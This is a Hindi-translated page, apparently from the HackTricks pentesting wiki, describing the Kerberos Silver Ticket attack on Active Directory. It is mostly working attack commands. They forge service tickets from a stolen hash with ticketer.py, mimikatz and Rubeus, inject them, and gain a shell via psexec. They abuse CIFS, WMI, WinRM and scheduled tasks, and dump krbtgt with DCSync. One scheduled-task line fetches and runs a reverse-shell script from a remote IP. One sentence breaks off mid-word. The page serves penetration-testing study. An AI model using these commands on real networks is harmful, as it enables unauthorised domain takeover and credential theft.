Silver Ticket

जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!

HackTricks का समर्थन करने के अन्य तरीके:

बग बाउंटी टिप: Intigriti के लिए साइन अप करें, एक प्रीमियम बग बाउंटी प्लेटफॉर्म जो हैकर्स द्वारा बनाया गया है! आज ही हमारे साथ शामिल हों https://go.intigriti.com/hacktricks और शुरू करें बाउंटी अप टू $100,000 तक कमाना!

सिल्वर टिकट

सिल्वर टिकट हमला Active Directory (AD) environments में सेवा टिकट का उपयोग करता है। इस विधि पर किसी सेवा खाते के NTLM हैश को प्राप्त करने पर निर्भर है, जैसे कि कंप्यूटर खाता, एक टिकट ग्रांटिंग सेवा (TGS) टिकट बनाने के लिए। इस जाली टिकट के साथ, एक हमलावर नेटवर्क पर विशेष सेवाओं तक पहुंच सकता है, किसी भी उपयोगकर्ता का अनुकरण करते हुए, आम तौर पर प्रशासनिक विशेषाधिकारों के लिए लक्ष्य रखता है। यह जोर दिया जाता है कि टिकट बनाने के लिए AES कुंजियों का उपयोग करना अधिक सुरक्षित और कम पकड़ने योग्य है।

टिकट निर्माण के लिए, विभिन्न उपकरणों का उपयोग ऑपरेटिंग सिस्टम पर किया जाता है:

लिनक्स पर

python ticketer.py -nthash <HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN> -spn <SERVICE_PRINCIPAL_NAME> <USER>
export KRB5CCNAME=/root/impacket-examples/<TICKET_NAME>.ccache
python psexec.py <DOMAIN>/<USER>@<TARGET> -k -no-pass

Windows पर

# Create the ticket
mimikatz.exe "kerberos::golden /domain:<DOMAIN> /sid:<DOMAIN_SID> /rc4:<HASH> /user:<USER> /service:<SERVICE> /target:<TARGET>"

# Inject the ticket
mimikatz.exe "kerberos::ptt <TICKET_FILE>"
.\Rubeus.exe ptt /ticket:<TICKET_FILE>

# Obtain a shell
.\PsExec.exe -accepteula \\<TARGET> cmd

उपलब्ध सेवाएं

सेवा प्रकारसेवा सिल्वर टिकट

WMI

HOST

RPCSS

PowerShell Remoting

HOST

HTTP

ओएस के आधार पर:

WSMAN

RPCSS

WinRM

HOST

HTTP

कुछ मौकों पर आप सीधे पूछ सकते हैं: WINRM

निर्धारित कार्य

HOST

Windows फ़ाइल साझा, जैसे psexec

CIFS

LDAP कार्यों, समेत DCSync

LDAP

Windows रिमोट सर्वर प्रशासन उपकरण

RPCSS

LDAP

CIFS

Golden Tickets

krbtgt

Rubeus का उपयोग करके आप इन सभी टिकट के लिए पूछ सकते हैं इस पैरामीटर का उपयोग करके:

  • /altservice:host,RPCSS,http,wsman,cifs,ldap,krbtgt,winrm

सिल्वर टिकट्स इवेंट आईडी

  • 4624: खाता लॉगऑन

  • 4634: खाता लॉगऑफ

  • 4672: व्यवस्थापक लॉगऑन

सेवा टिकट का दुरुपयोग

निम्नलिखित उदाहरणों में यह सोचा जाता है कि टिकट प्रशासक खाता का अनुकरण करके प्राप्त किया गया है।

CIFS

इस टिकट के साथ आप SMB के माध्यम से C$ और ADMIN$ फ़ोल्डर तक पहुँच सकेंगे (अगर वे उजागर हैं) और दूरस्थ फ़ाइल सिस्टम के किसी हिस्से में फ़ाइलें कॉपी कर सकेंगे:

dir \\vulnerable.computer\C$
dir \\vulnerable.computer\ADMIN$
copy afile.txt \\vulnerable.computer\C$\Windows\Temp

होस्ट

इस अनुमति के साथ आप दूरस्थ कंप्यूटर में निर्धारित समय सारणियों को उत्पन्न कर सकते हैं और विचित्र आदेशों को क्रियान्वित कर सकते हैं:

#Check you have permissions to use schtasks over a remote server
schtasks /S some.vuln.pc
#Create scheduled task, first for exe execution, second for powershell reverse shell download
schtasks /create /S some.vuln.pc /SC weekly /RU "NT Authority\System" /TN "SomeTaskName" /TR "C:\path\to\executable.exe"
schtasks /create /S some.vuln.pc /SC Weekly /RU "NT Authority\SYSTEM" /TN "SomeTaskName" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1''')'"
#Check it was successfully created
schtasks /query /S some.vuln.pc
#Run created schtask now
schtasks /Run /S mcorp-dc.moneycorp.local /TN "SomeTaskName"

होस्ट + RPCSS

इन टिकट्स के साथ आप पीड़ित सिस्टम में WMI का निष्पादन कर सकते हैं:

#Check you have enough privileges
Invoke-WmiMethod -class win32_operatingsystem -ComputerName remote.computer.local
#Execute code
Invoke-WmiMethod win32_process -ComputerName $Computer -name create -argumentlist "$RunCommand"

#You can also use wmic
wmic remote.computer.local list full /format:list

होस्ट + WSMAN (WINRM)

एक कंप्यूटर पर winrm एक्सेस के साथ आप **इसे एक्स

New-PSSession -Name PSC -ComputerName the.computer.name; Enter-PSSession PSC

LDAP

इस विशेषाधिकार के साथ आप DCSync का उपयोग करके DC डेटाबेस को डंप कर सकते हैं:

mimikatz(commandline) # lsadump::dcsync /dc:pcdc.domain.local /domain:domain.local /user:krbtgt

DCSync के बारे में अधिक जानकारी पाने के लिए निम्नलिखित पृष्ठ पर जाएं:

संदर्भ

pageDCSync

बग बाउंटी टिप: Intigriti में साइन अप करें, एक प्रीमियम बग बाउंटी प्लेटफॉर्म जो हैकर्स द्वारा बनाया गया है! हमारे साथ शामिल हों https://go.intigriti.com/hacktricks आज ही, और शुरू करें बाउंटी कमाना तक $100,000 तक!

जीरो से हीरो तक AWS हैकिंग सीखें htARTE (HackTricks AWS Red Team Expert)!

HackTricks का समर्थन करने के अन्य तरीके:

Last updated